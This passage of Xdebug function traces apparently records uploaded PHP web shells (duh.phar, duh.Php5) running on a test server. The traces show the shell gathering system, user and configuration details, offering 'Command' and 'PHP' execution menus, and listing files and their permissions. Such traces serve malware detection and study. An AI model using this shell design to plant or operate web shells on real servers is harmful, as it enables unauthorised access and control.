3 217 0 0.008084 495488 is_writable 0 /var/www/html/uploads/duh.phar 56 1 'prepend.php'
3 217 1 0.008099 495528
3 217 R FALSE
3 218 0 0.008112 495488 is_writable 0 /var/www/html/uploads/duh.phar 56 1 'prepend.php'
3 218 1 0.008126 495528
3 218 R FALSE
3 219 0 0.008138 495488 is_readable 0 /var/www/html/uploads/duh.phar 56 1 'prepend.php'
3 219 1 0.008152 495528
3 219 R TRUE
2 A /var/www/html/uploads/duh.phar 56 $c = ''
3 220 0 0.008176 495488 is_writable 0 /var/www/html/uploads/duh.phar 56 1 'prepend.php'
3 220 1 0.008191 495528
3 220 R FALSE
3 221 0 0.008204 495488 is_readable 0 /var/www/html/uploads/duh.phar 56 1 'prepend.php'
3 221 1 0.008217 495528
3 221 R TRUE
2 216 1 0.008230 495488
2 216 R ''
2 222 0 0.008243 495488 perms 1 /var/www/html/uploads/duh.phar 42 1 'prepend.php'
3 223 0 0.008255 495488 file_exists 0 /var/www/html/uploads/duh.phar 57 1 'prepend.php'
3 223 1 0.008268 495528
3 223 R TRUE
3 224 0 0.008281 495488 fileperms 0 /var/www/html/uploads/duh.phar 57 1 'prepend.php'
3 224 1 0.008293 495528
3 224 R 33261
3 225 0 0.008308 495488 sprintf 0 /var/www/html/uploads/duh.phar 57 2 '%o' 33261
3 225 1 0.008326 495872
3 225 R '100755'
3 226 0 0.008341 495808 substr 0 /var/www/html/uploads/duh.phar 57 2 '100755' -4
3 226 1 0.008358 495904
3 226 R '0755'
2 222 1 0.008371 495520
2 222 R '0755'
2 227 0 0.008384 495744 realpath 0 /var/www/html/uploads/duh.phar 42 1 '.'
2 227 1 0.008406 495824
2 227 R '/var/www/html/uploads'
2 228 0 0.008421 495744 realpath 0 /var/www/html/uploads/duh.phar 42 1 'prepend.php'
2 228 1 0.008434 495840
2 228 R '/var/www/html/uploads/prepend.php'
2 229 0 0.008449 495744 perms 1 /var/www/html/uploads/duh.phar 42 1 'prepend.php'
3 230 0 0.008461 495744 file_exists 0 /var/www/html/uploads/duh.phar 57 1 'prepend.php'
3 230 1 0.008476 495784
3 230 R TRUE
3 231 0 0.008489 495744 fileperms 0 /var/www/html/uploads/duh.phar 57 1 'prepend.php'
3 231 1 0.008501 495784
3 231 R 33261
3 232 0 0.008514 495744 sprintf 0 /var/www/html/uploads/duh.phar 57 2 '%o' 33261
3 232 1 0.008527 496128
3 232 R '100755'
3 233 0 0.008546 496064 substr 0 /var/www/html/uploads/duh.phar 57 2 '100755' -4
3 233 1 0.008559 496160
3 233 R '0755'
2 229 1 0.008572 495776
2 229 R '0755'
1 3 1 0.008591 494464
0.008632 347184
TRACE END [2023-02-12 19:34:03.882742]
data/traces/d1f9301980fe3353e9ad011975f546ec_trace-1676242973.8815.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:03:19.779304]
1 0 1 0.000205 393512
1 3 0 0.000801 487616 {main} 1 /var/www/html/uploads/duh.Php5 0 0
2 4 0 0.000825 487616 error_reporting 0 /var/www/html/uploads/duh.Php5 2 1 0
2 4 1 0.000842 487656
2 4 R 22527
1 A /var/www/html/uploads/duh.Php5 3 $xyn = 'tunafeesh'
2 5 0 0.000891 487616 basename 0 /var/www/html/uploads/duh.Php5 6 1 '/var/www/html/uploads/duh.Php5'
2 5 1 0.000910 487688
2 5 R 'duh.Php5'
1 A /var/www/html/uploads/duh.Php5 6 $me = 'duh.Php5'
1 A /var/www/html/uploads/duh.Php5 6 $server_soft = 'Apache/2.4.52 (Ubuntu)'
2 6 0 0.000948 487656 php_uname 0 /var/www/html/uploads/duh.Php5 6 0
2 6 1 0.000963 487768
2 6 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1 A /var/www/html/uploads/duh.Php5 6 $uname = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2 7 0 0.000999 487768 get_current_user 0 /var/www/html/uploads/duh.Php5 6 0
2 7 1 0.001039 487808
2 7 R 'osboxes'
2 8 0 0.001055 487816 getmyuid 0 /var/www/html/uploads/duh.Php5 6 0
2 8 1 0.001068 487816
2 8 R 1000
2 9 0 0.001081 487824 getmygid 0 /var/www/html/uploads/duh.Php5 6 0
2 9 1 0.001092 487824
2 9 R 1000
1 A /var/www/html/uploads/duh.Php5 6 $cur_user = 'osboxes uid:1000 gid:1000'
2 10 0 0.001116 487832 ini_get 0 /var/www/html/uploads/duh.Php5 6 1 'safe_mode'
2 10 1 0.001131 487864
2 10 R FALSE
1 A /var/www/html/uploads/duh.Php5 6 $safe_mode = FALSE
1 A /var/www/html/uploads/duh.Php5 6 $safe_mode = '<font color=#ccff00>OFF</font>'
2 11 0 0.001168 487832 getcwd 0 /var/www/html/uploads/duh.Php5 6 0
2 11 1 0.001182 487880
2 11 R '/var/www/html/uploads'
1 A /var/www/html/uploads/duh.Php5 6 $cwd = '/var/www/html/uploads'
1 A /var/www/html/uploads/duh.Php5 6 $bckC = '#333333'
1 A /var/www/html/uploads/duh.Php5 6 $txtC = '#999999'
2 12 0 0.001228 487880 getenv 0 /var/www/html/uploads/duh.Php5 7 1 'HTTP_HOST'
2 12 1 0.001243 487952
2 12 R 'localhost'
1 A /var/www/html/uploads/duh.Php5 7 $start = '<html><head><title>localhost </title><style>body {background:#333333;color:#999999;font-size:9pt;font-family:Trebuchet MS,cursive,sans serif;}h1#n{position:fixed;top:10px;left:10px;text-shadow:0px 0px 5px black;color:#79a317;}h1#nm{text-shadow:0px 0px 5px black;color:#79a317;}a {color:#999999;text-decoration:none;font-family:Comic Sans Ms,cursive,sans serif;}a:hover {color:#79a317;}hr {background:#999999;color:black;}p#bck{position:fixed;top:20px;right:20px;}#menu {position:fixed;bottom:0px;width:100%;font-'
2 13 0 0.001287 490056 realpath 0 /var/www/html/uploads/duh.Php5 8 1 '.'
2 13 1 0.001301 490136
2 13 R '/var/www/html/uploads'
2 14 0 0.001317 490120 realpath 0 /var/www/html/uploads/duh.Php5 8 1 '.'
2 14 1 0.001330 490200
2 14 R '/var/www/html/uploads'
1 A /var/www/html/uploads/duh.Php5 8 $menu = '<center><p id="menu"><span id="menuB"><<a href="duh.Php5">Home</a>> <<a href="?x=cmd&d="/var/www/html/uploads">Command</a>> <<a href="?x=php&d="/var/www/html/uploads">PHP</a>> <<a href="javascript:get_inf();">Info</a>> <<a href="?x=q">Logout</a>> </span></p></center>'
1 A /var/www/html/uploads/duh.Php5 8 $end = '</body></html>'
1 A /var/www/html/uploads/duh.Php5 8 $inf = '<center><p id="inf">||| <b><i><u>Software:</u></i></b> Apache/2.4.52 (Ubuntu) ||| <b><i><u>Uname:</u></i></b> Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 |||</br>||| <b><i><u>User:</u></i></b> osboxes uid:1000 gid:1000 ||| <b><i><u>Safe Mode:</u></i></b> <font color=#ccff00>OFF</font> ||| <b><i><u>Directory: </i></b></u>/var/www/html/uploads |||</p></center><hr>'
2 15 0 0.001401 490696 phpversion 0 /var/www/html/uploads/duh.Php5 10 0
2 15 1 0.001414 490760
2 15 R '7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
2 16 0 0.001430 491456 zend_version 0 /var/www/html/uploads/duh.Php5 10 0
2 16 1 0.001441 491488
2 16 R '3.2.0'
2 17 0 0.001455 491488 magic_quotes 1 /var/www/html/uploads/duh.Php5 10 0
3 18 0 0.001467 491488 get_magic_quotes_gpc 0 /var/www/html/uploads/duh.Php5 46 0
3 18 1 0.001480 491488
3 18 R FALSE
2 A /var/www/html/uploads/duh.Php5 46 $x = FALSE
2 A /var/www/html/uploads/duh.Php5 46 $m = '<font color=#ccff00>OFF</font>'
2 17 1 0.001515 491488
2 17 R '<font color=#ccff00>OFF</font>'
2 19 0 0.001531 491488 curl 1 /var/www/html/uploads/duh.Php5 10 0
3 20 0 0.001550 491488 extension_loaded 0 /var/www/html/uploads/duh.Php5 47 1 'curl'
3 20 1 0.001563 491528
3 20 R TRUE
2 A /var/www/html/uploads/duh.Php5 47 $c = '<font color=crimson>ON</font>'
2 19 1 0.001588 491488
2 19 R '<font color=crimson>ON</font>'
2 21 0 0.001604 491488 reg_globals 1 /var/www/html/uploads/duh.Php5 10 0
3 22 0 0.001615 491488 ini_get 0 /var/www/html/uploads/duh.Php5 48 1 'reqister_globals'
3 22 1 0.001629 491520
3 22 R FALSE
2 A /var/www/html/uploads/duh.Php5 48 $r = '<font color=#ccff00>OFF</font>'
2 21 1 0.001653 491488
2 21 R '<font color=#ccff00>OFF</font>'
2 23 0 0.001669 491488 openbase_dir 1 /var/www/html/uploads/duh.Php5 10 0
3 24 0 0.001681 491488 ini_get 0 /var/www/html/uploads/duh.Php5 45 1 'open_basedir'
3 24 1 0.001694 491520
3 24 R ''
2 A /var/www/html/uploads/duh.Php5 45 $x = ''
2 A /var/www/html/uploads/duh.Php5 45 $o = '<font color=#ccff00>OFF</font>'
2 23 1 0.001728 491488
2 23 R '<font color=#ccff00>OFF</font>'
2 25 0 0.001743 491488 myql 1 /var/www/html/uploads/duh.Php5 10 0
3 26 0 0.001754 491488 function_exists 0 /var/www/html/uploads/duh.Php5 51 1 'mysql_connect'
3 26 1 0.001767 491528
3 26 R FALSE
2 A /var/www/html/uploads/duh.Php5 51 $m = '<font color=#ccff00>OFF</font>'
2 25 1 0.001792 491488
2 25 R '<font color=#ccff00>OFF</font>'
2 27 0 0.001806 491488 gzip 1 /var/www/html/uploads/duh.Php5 10 0
3 28 0 0.001817 491488 function_exists 0 /var/www/html/uploads/duh.Php5 53 1 'gzencode'
3 28 1 0.001830 491528
3 28 R TRUE
2 A /var/www/html/uploads/duh.Php5 53 $m = '<font color=crimson>ON</font>'
2 27 1 0.001854 491488
2 27 R '<font color=crimson>ON</font>'
2 29 0 0.001869 491488 mssql 1 /var/www/html/uploads/duh.Php5 10 0
3 30 0 0.001880 491488 function_exists 0 /var/www/html/uploads/duh.Php5 52 1 'mssql_connect'
3 30 1 0.001893 491528
3 30 R FALSE
2 A /var/www/html/uploads/duh.Php5 52 $m = '<font color=#ccff00>OFF</font>'
2 29 1 0.001917 491488
2 29 R '<font color=#ccff00>OFF</font>'
2 31 0 0.001931 491488 postgresql 1 /var/www/html/uploads/duh.Php5 10 0
3 32 0 0.001942 491488 function_exists 0 /var/www/html/uploads/duh.Php5 50 1 'pg_connect'
3 32 1 0.001955 491528
3 32 R FALSE
2 A /var/www/html/uploads/duh.Php5 50 $p = '<font color=#ccff00>OFF</font>'
2 31 1 0.001978 491488
2 31 R '<font color=#ccff00>OFF</font>'
2 33 0 0.001993 491488 oracle 1 /var/www/html/uploads/duh.Php5 10 0
3 34 0 0.002004 491488 function_exists 0 /var/www/html/uploads/duh.Php5 49 1 'ocilogon'
3 34 1 0.002017 491528
3 34 R FALSE
2 A /var/www/html/uploads/duh.Php5 49 $o = '<font color=#ccff00>OFF</font>'
2 33 1 0.002041 491488
2 33 R '<font color=#ccff00>OFF</font>'
2 35 0 0.002055 491488 disk_total_space 0 /var/www/html/uploads/duh.Php5 10 1 '/'
2 35 1 0.002070 491520
2 35 R 232015802368
2 36 0 0.002085 491488 h_size 1 /var/www/html/uploads/duh.Php5 10 1 232015802368
3 37 0 0.002099 491488 round 0 /var/www/html/uploads/duh.Php5 54 1 21608.155441284
3 37 1 0.002111 491520
3 37 R 21608
2 A /var/www/html/uploads/duh.Php5 54 $s = '216.08GB'
2 36 1 0.002136 491528
2 36 R '216.08GB'
2 38 0 0.002150 491528 disk_free_space 0 /var/www/html/uploads/duh.Php5 10 1 '/'
2 38 1 0.002164 491560
2 38 R 205670285312
2 39 0 0.002177 491528 h_size 1 /var/www/html/uploads/duh.Php5 10 1 205670285312
3 40 0 0.002190 491528 round 0 /var/www/html/uploads/duh.Php5 54 1 19154.537963867
3 40 1 0.002203 491560
3 40 R 19155
2 A /var/www/html/uploads/duh.Php5 54 $s = '191.55GB'
2 39 1 0.002227 491568
2 39 R '191.55GB'
1 A /var/www/html/uploads/duh.Php5 10 $moreI = ['PHP Version' => '7.2.34-37+ubuntu22.04.1+deb.sury.org+1', 'Zend Version' => '3.2.0', 'Magic Quotes' => '<font color=#ccff00>OFF</font>', 'Curl' => '<font color=crimson>ON</font>', 'Register Globals' => '<font color=#ccff00>OFF</font>', 'OpenBase Dir' => '<font color=#ccff00>OFF</font>', 'MySQL' => '<font color=#ccff00>OFF</font>', 'Gzip' => '<font color=crimson>ON</font>', 'MsSQL' => '<font color=#ccff00>OFF</font>', 'PostgreSQL' => '<font color=#ccff00>OFF</font>', 'Oracle' => '<font color=#ccff00>OFF</font>', 'Total Space' => '216.08GB', 'Used Space' => '191.55GB', 'Your IP' => '127.0.0.1', 'Server IP' => '127.0.0.1']
1 A /var/www/html/uploads/duh.Php5 10 $n = 'PHP Version'
1 A /var/www/html/uploads/duh.Php5 10 $n = 'Zend Version'
1 A /var/www/html/uploads/duh.Php5 10 $n = 'Magic Quotes'
1 A /var/www/html/uploads/duh.Php5 10 $n = 'Curl'
1 A /var/www/html/uploads/duh.Php5 10 $n = 'Register Globals'
1 A /var/www/html/uploads/duh.Php5 10 $n = 'OpenBase Dir'
1 A /var/www/html/uploads/duh.Php5 10 $n = 'MySQL'
1 A /var/www/html/uploads/duh.Php5 10 $n = 'Gzip'
1 A /var/www/html/uploads/duh.Php5 10 $n = 'MsSQL'
1 A /var/www/html/uploads/duh.Php5 10 $n = 'PostgreSQL'
1 A /var/www/html/uploads/duh.Php5 10 $n = 'Oracle'
1 A /var/www/html/uploads/duh.Php5 10 $n = 'Total Space'
1 A /var/www/html/uploads/duh.Php5 10 $n = 'Used Space'
1 A /var/www/html/uploads/duh.Php5 10 $n = 'Your IP'
1 A /var/www/html/uploads/duh.Php5 10 $n = 'Server IP'
2 41 0 0.002435 491568 curpath 1 /var/www/html/uploads/duh.Php5 34 1 ''
3 42 0 0.002448 491568 getcwd 0 /var/www/html/uploads/duh.Php5 55 0
3 42 1 0.002461 491616
3 42 R '/var/www/html/uploads'
2 A /var/www/html/uploads/duh.Php5 55 $d = '/var/www/html/uploads'
2 A /var/www/html/uploads/duh.Php5 55 $p = ''
2 A /var/www/html/uploads/duh.Php5 55 $n = ''
3 43 0 0.002503 491616 explode 0 /var/www/html/uploads/duh.Php5 55 2 '/' '/var/www/html/uploads'
3 43 1 0.002516 492192
3 43 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2 A /var/www/html/uploads/duh.Php5 55 $dx = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2 A /var/www/html/uploads/duh.Php5 55 $i = 0
2 A /var/www/html/uploads/duh.Php5 55 $g = ''
2 A /var/www/html/uploads/duh.Php5 55 $p .= '/'
2 A /var/www/html/uploads/duh.Php5 55 $n .= '<a href="?d=/"></a>/'
2 A /var/www/html/uploads/duh.Php5 55 $i++
2 A /var/www/html/uploads/duh.Php5 55 $g = 'var'
2 A /var/www/html/uploads/duh.Php5 55 $p .= 'var/'
2 A /var/www/html/uploads/duh.Php5 55 $n .= '<a href="?d=/var/">var</a>/'
2 A /var/www/html/uploads/duh.Php5 55 $i++
2 A /var/www/html/uploads/duh.Php5 55 $g = 'www'
2 A /var/www/html/uploads/duh.Php5 55 $p .= 'www/'
2 A /var/www/html/uploads/duh.Php5 55 $n .= '<a href="?d=/var/www/">www</a>/'
2 A /var/www/html/uploads/duh.Php5 55 $i++
2 A /var/www/html/uploads/duh.Php5 55 $g = 'html'
2 A /var/www/html/uploads/duh.Php5 55 $p .= 'html/'
2 A /var/www/html/uploads/duh.Php5 55 $n .= '<a href="?d=/var/www/html/">html</a>/'
2 A /var/www/html/uploads/duh.Php5 55 $i++
2 A /var/www/html/uploads/duh.Php5 55 $g = 'uploads'
2 A /var/www/html/uploads/duh.Php5 55 $p .= 'uploads/'
2 A /var/www/html/uploads/duh.Php5 55 $n .= '<a href="?d=/var/www/html/uploads/">uploads</a>/'
2 A /var/www/html/uploads/duh.Php5 55 $i++
2 41 1 0.002742 491760
2 41 R '<a href="?d=/"></a>/<a href="?d=/var/">var</a>/<a href="?d=/var/www/">www</a>/<a href="?d=/var/www/html/">html</a>/<a href="?d=/var/www/html/uploads/">uploads</a>/'
2 44 0 0.002762 491568 realpath 0 /var/www/html/uploads/duh.Php5 35 1 '.'
2 44 1 0.002776 491648
2 44 R '/var/www/html/uploads'
2 45 0 0.002791 491792 realpath 0 /var/www/html/uploads/duh.Php5 35 1 '.'
2 45 1 0.002803 491872
2 45 R '/var/www/html/uploads'
2 46 0 0.002818 491952 realpath 0 /var/www/html/uploads/duh.Php5 35 1 '.'
2 46 1 0.002831 492032
2 46 R '/var/www/html/uploads'
2 47 0 0.002844 492016 realpath 0 /var/www/html/uploads/duh.Php5 35 1 '.'
2 47 1 0.002857 492096
2 47 R '/var/www/html/uploads'
2 48 0 0.002872 492336 realpath 0 /var/www/html/uploads/duh.Php5 35 1 '.'
2 48 1 0.002884 492416
2 48 R '/var/www/html/uploads'
2 49 0 0.002898 492464 realpath 0 /var/www/html/uploads/duh.Php5 35 1 '.'
2 49 1 0.002910 492544
2 49 R '/var/www/html/uploads'
1 A /var/www/html/uploads/duh.Php5 37 $filex = []
1 A /var/www/html/uploads/duh.Php5 38 $dirx = []
2 50 0 0.002955 491680 opendir 0 /var/www/html/uploads/duh.Php5 40 1 '.'
2 50 1 0.002975 492072
2 50 R resource(4) of type (stream)
1 A /var/www/html/uploads/duh.Php5 40 $handle = resource(4) of type (stream)
2 51 0 0.003002 492040 readdir 0 /var/www/html/uploads/duh.Php5 40 1 resource(4) of type (stream)
2 51 1 0.003024 492120
2 51 R 'duh.Php5'
1 A /var/www/html/uploads/duh.Php5 40 $file = 'duh.Php5'
2 52 0 0.003049 492080 is_dir 0 /var/www/html/uploads/duh.Php5 40 1 'duh.Php5'
2 52 1 0.003063 492136
2 52 R FALSE
1 A /var/www/html/uploads/duh.Php5 40 $filex[] .= 'duh.Php5'
2 53 0 0.003089 492512 readdir 0 /var/www/html/uploads/duh.Php5 40 1 resource(4) of type (stream)
2 53 1 0.003103 492584
2 53 R '..'
1 A /var/www/html/uploads/duh.Php5 40 $file = '..'
2 54 0 0.003126 492504 is_dir 0 /var/www/html/uploads/duh.Php5 40 1 '..'
2 54 1 0.003140 492536
2 54 R TRUE
1 A /var/www/html/uploads/duh.Php5 40 $dirx[] .= '..'
2 55 0 0.003163 492904 readdir 0 /var/www/html/uploads/duh.Php5 40 1 resource(4) of type (stream)
2 55 1 0.003176 492976
2 55 R '.'
1 A /var/www/html/uploads/duh.Php5 40 $file = '.'
2 56 0 0.003198 492904 is_dir 0 /var/www/html/uploads/duh.Php5 40 1 '.'
2 56 1 0.003211 492944
2 56 R TRUE
1 A /var/www/html/uploads/duh.Php5 40 $dirx[] .= '.'
2 57 0 0.003234 492936 readdir 0 /var/www/html/uploads/duh.Php5 40 1 resource(4) of type (stream)
2 57 1 0.003247 493016
2 57 R 'prepend.php'
1 A /var/www/html/uploads/duh.Php5 40 $file = 'prepend.php'
2 58 0 0.003271 492944 is_dir 0 /var/www/html/uploads/duh.Php5 40 1 'prepend.php'
2 58 1 0.003286 492992
2 58 R FALSE
1 A /var/www/html/uploads/duh.Php5 40 $filex[] .= 'prepend.php'
2 59 0 0.003310 492992 readdir 0 /var/www/html/uploads/duh.Php5 40 1 resource(4) of type (stream)
2 59 1 0.003323 493064
2 59 R 'data'
1 A /var/www/html/uploads/duh.Php5 40 $file = 'data'
2 60 0 0.003345 492984 is_dir 0 /var/www/html/uploads/duh.Php5 40 1 'data'
2 60 1 0.003359 493016
2 60 R TRUE
1 A /var/www/html/uploads/duh.Php5 40 $dirx[] .= 'data'
2 61 0 0.003381 493008 readdir 0 /var/www/html/uploads/duh.Php5 40 1 resource(4) of type (stream)
2 61 1 0.003395 493088
2 61 R '.htaccess'
1 A /var/www/html/uploads/duh.Php5 40 $file = '.htaccess'
2 62 0 0.003418 493016 is_dir 0 /var/www/html/uploads/duh.Php5 40 1 '.htaccess'
2 62 1 0.003433 493064
2 62 R FALSE
1 A /var/www/html/uploads/duh.Php5 40 $filex[] .= '.htaccess'
2 63 0 0.003456 493064 readdir 0 /var/www/html/uploads/duh.Php5 40 1 resource(4) of type (stream)
2 63 1 0.003470 493104
2 63 R FALSE
1 A /var/www/html/uploads/duh.Php5 40 $file = FALSE
2 64 0 0.003493 493048 asort 0 /var/www/html/uploads/duh.Php5 40 1 [0 => 'duh.Php5', 1 => 'prepend.php', 2 => '.htaccess']
2 64 1 0.003510 493080
2 64 R TRUE
2 65 0 0.003523 493072 asort 0 /var/www/html/uploads/duh.Php5 40 1 [0 => '..', 1 => '.', 2 => 'data']
2 65 1 0.003538 493104
2 65 R TRUE
1 A /var/www/html/uploads/duh.Php5 40 $i = 0
2 66 0 0.003561 493072 function_exists 0 /var/www/html/uploads/duh.Php5 41 1 'posix_getpwuid'
2 66 1 0.003575 493112
2 66 R TRUE
2 67 0 0.003587 493072 function_exists 0 /var/www/html/uploads/duh.Php5 41 1 'posix_getgrgid'
2 67 1 0.003601 493112
2 67 R TRUE
2 68 0 0.003613 493072 fileowner 0 /var/www/html/uploads/duh.Php5 41 1 '.'
2 68 1 0.003627 493104
2 68 R 0
2 69 0 0.003640 493064 posix_getpwuid 0 /var/www/html/uploads/duh.Php5 41 1 0
2 69 1 0.003666 493864
2 69 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.Php5 41 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 70 0 0.003706 493832 filegroup 0 /var/www/html/uploads/duh.Php5 41 1 '.'
2 70 1 0.003724 493872
2 70 R 0
2 71 0 0.003736 493832 posix_getgrgid 0 /var/www/html/uploads/duh.Php5 41 1 0
2 71 1 0.003760 494488
2 71 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/duh.Php5 41 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 72 0 0.003794 494520 realpath 0 /var/www/html/uploads/duh.Php5 41 1 '.'
2 72 1 0.003807 494600
2 72 R '/var/www/html/uploads'
2 73 0 0.003823 494616 realpath 0 /var/www/html/uploads/duh.Php5 41 1 '.'
2 73 1 0.003836 494696
2 73 R '/var/www/html/uploads'
2 74 0 0.003851 494680 realpath 0 /var/www/html/uploads/duh.Php5 41 1 '.'
2 74 1 0.003863 494760
2 74 R '/var/www/html/uploads'
2 75 0 0.003878 495096 realpath 0 /var/www/html/uploads/duh.Php5 41 1 '.'
2 75 1 0.003891 495176
2 75 R '/var/www/html/uploads'
2 76 0 0.003905 495096 realpath 0 /var/www/html/uploads/duh.Php5 41 1 '.'
2 76 1 0.003917 495176
2 76 R '/var/www/html/uploads'
2 77 0 0.003931 495352 get_color 1 /var/www/html/uploads/duh.Php5 41 1 '.'
3 78 0 0.003944 495352 is_writable 0 /var/www/html/uploads/duh.Php5 56 1 '.'
3 78 1 0.003963 495392
3 78 R TRUE
2 A /var/www/html/uploads/duh.Php5 56 $c = '#ccff00'
3 79 0 0.003986 495352 is_writable 0 /var/www/html/uploads/duh.Php5 56 1 '.'
3 79 1 0.004000 495392
3 79 R TRUE
3 80 0 0.004014 495352 is_writable 0 /var/www/html/uploads/duh.Php5 56 1 '.'
3 80 1 0.004027 495392
3 80 R TRUE
2 77 1 0.004040 495352
2 77 R '#ccff00'
2 81 0 0.004054 495352 perms 1 /var/www/html/uploads/duh.Php5 41 1 '.'
3 82 0 0.004066 495352 file_exists 0 /var/www/html/uploads/duh.Php5 57 1 '.'
3 82 1 0.004080 495392
3 82 R TRUE
3 83 0 0.004093 495352 fileperms 0 /var/www/html/uploads/duh.Php5 57 1 '.'
3 83 1 0.004105 495392
3 83 R 16895
3 84 0 0.004117 495352 sprintf 0 /var/www/html/uploads/duh.Php5 57 2 '%o' 16895
3 84 1 0.004131 495736
3 84 R '40777'
3 85 0 0.004144 495672 substr 0 /var/www/html/uploads/duh.Php5 57 2 '40777' -4
3 85 1 0.004157 495768
3 85 R '0777'
2 81 1 0.004170 495384
2 81 R '0777'
2 86 0 0.004183 495480 realpath 0 /var/www/html/uploads/duh.Php5 41 1 '.'
2 86 1 0.004195 495560
2 86 R '/var/www/html/uploads'
2 87 0 0.004210 495480 realpath 0 /var/www/html/uploads/duh.Php5 41 1 '.'
2 87 1 0.004222 495560
2 87 R '/var/www/html/uploads'
2 88 0 0.004236 495736 perms 1 /var/www/html/uploads/duh.Php5 41 1 '.'
3 89 0 0.004248 495736 file_exists 0 /var/www/html/uploads/duh.Php5 57 1 '.'
3 89 1 0.004261 495776
3 89 R TRUE
3 90 0 0.004274 495736 fileperms 0 /var/www/html/uploads/duh.Php5 57 1 '.'
3 90 1 0.004286 495776
3 90 R 16895
3 91 0 0.004299 495736 sprintf 0 /var/www/html/uploads/duh.Php5 57 2 '%o' 16895
3 91 1 0.004312 496120
3 91 R '40777'
3 92 0 0.004324 496056 substr 0 /var/www/html/uploads/duh.Php5 57 2 '40777' -4
3 92 1 0.004337 496152
3 92 R '0777'
2 88 1 0.004349 495768
2 88 R '0777'
1 A /var/www/html/uploads/duh.Php5 41 $i++
2 93 0 0.004373 494456 function_exists 0 /var/www/html/uploads/duh.Php5 41 1 'posix_getpwuid'
2 93 1 0.004387 494496
2 93 R TRUE
2 94 0 0.004399 494456 function_exists 0 /var/www/html/uploads/duh.Php5 41 1 'posix_getgrgid'
2 94 1 0.004412 494496
2 94 R TRUE
2 95 0 0.004424 494456 fileowner 0 /var/www/html/uploads/duh.Php5 41 1 '..'
2 95 1 0.004438 494496
2 95 R 0
2 96 0 0.004451 494456 posix_getpwuid 0 /var/www/html/uploads/duh.Php5 41 1 0
2 96 1 0.004493 495256
2 96 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.Php5 41 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 97 0 0.004534 494456 filegroup 0 /var/www/html/uploads/duh.Php5 41 1 '..'
2 97 1 0.004551 494496
2 97 R 0
2 98 0 0.004563 494456 posix_getgrgid 0 /var/www/html/uploads/duh.Php5 41 1 0
2 98 1 0.004585 495112
2 98 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/duh.Php5 41 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 99 0 0.004666 494520 realpath 0 /var/www/html/uploads/duh.Php5 41 1 '..'
2 99 1 0.004680 494592
2 99 R '/var/www/html'
2 100 0 0.004695 494616 realpath 0 /var/www/html/uploads/duh.Php5 41 1 '.'
2 100 1 0.004707 494696
2 100 R '/var/www/html/uploads'
2 101 0 0.004723 494680 realpath 0 /var/www/html/uploads/duh.Php5 41 1 '.'
2 101 1 0.004736 494760
2 101 R '/var/www/html/uploads'
2 102 0 0.004750 495096 realpath 0 /var/www/html/uploads/duh.Php5 41 1 '.'
2 102 1 0.004763 495176
2 102 R '/var/www/html/uploads'
2 103 0 0.004777 495096 realpath 0 /var/www/html/uploads/duh.Php5 41 1 '..'
2 103 1 0.004790 495168
2 103 R '/var/www/html'
2 104 0 0.004805 495352 get_color 1 /var/www/html/uploads/duh.Php5 41 1 '..'
3 105 0 0.004817 495352 is_writable 0 /var/www/html/uploads/duh.Php5 56 1 '..'
3 105 1 0.004833 495392
3 105 R TRUE
2 A /var/www/html/uploads/duh.Php5 56 $c = '#ccff00'
3 106 0 0.004856 495352 is_writable 0 /var/www/html/uploads/duh.Php5 56 1 '..'
3 106 1 0.004871 495392
3 106 R TRUE
3 107 0 0.004891 495352 is_writable 0 /var/www/html/uploads/duh.Php5 56 1 '..'
3 107 1 0.004906 495392
3 107 R TRUE
2 104 1 0.004919 495352
2 104 R '#ccff00'
2 108 0 0.004932 495352 perms 1 /var/www/html/uploads/duh.Php5 41 1 '..'
3 109 0 0.004944 495352 file_exists 0 /var/www/html/uploads/duh.Php5 57 1 '..'
3 109 1 0.004958 495392
3 109 R TRUE
3 110 0 0.004971 495352 fileperms 0 /var/www/html/uploads/duh.Php5 57 1 '..'
3 110 1 0.004983 495392
3 110 R 16895
3 111 0 0.004996 495352 sprintf 0 /var/www/html/uploads/duh.Php5 57 2 '%o' 16895
3 111 1 0.005014 495736
3 111 R '40777'
3 112 0 0.005035 495672 substr 0 /var/www/html/uploads/duh.Php5 57 2 '40777' -4
3 112 1 0.005049 495768
3 112 R '0777'
2 108 1 0.005062 495384
2 108 R '0777'
2 113 0 0.005075 495480 realpath 0 /var/www/html/uploads/duh.Php5 41 1 '.'
2 113 1 0.005089 495560
2 113 R '/var/www/html/uploads'
2 114 0 0.005104 495480 realpath 0 /var/www/html/uploads/duh.Php5 41 1 '..'
2 114 1 0.005117 495552
2 114 R '/var/www/html'
2 115 0 0.005131 495736 perms 1 /var/www/html/uploads/duh.Php5 41 1 '..'
3 116 0 0.005143 495736 file_exists 0 /var/www/html/uploads/duh.Php5 57 1 '..'
3 116 1 0.005158 495776
3 116 R TRUE
3 117 0 0.005171 495736 fileperms 0 /var/www/html/uploads/duh.Php5 57 1 '..'
3 117 1 0.005183 495776
3 117 R 16895
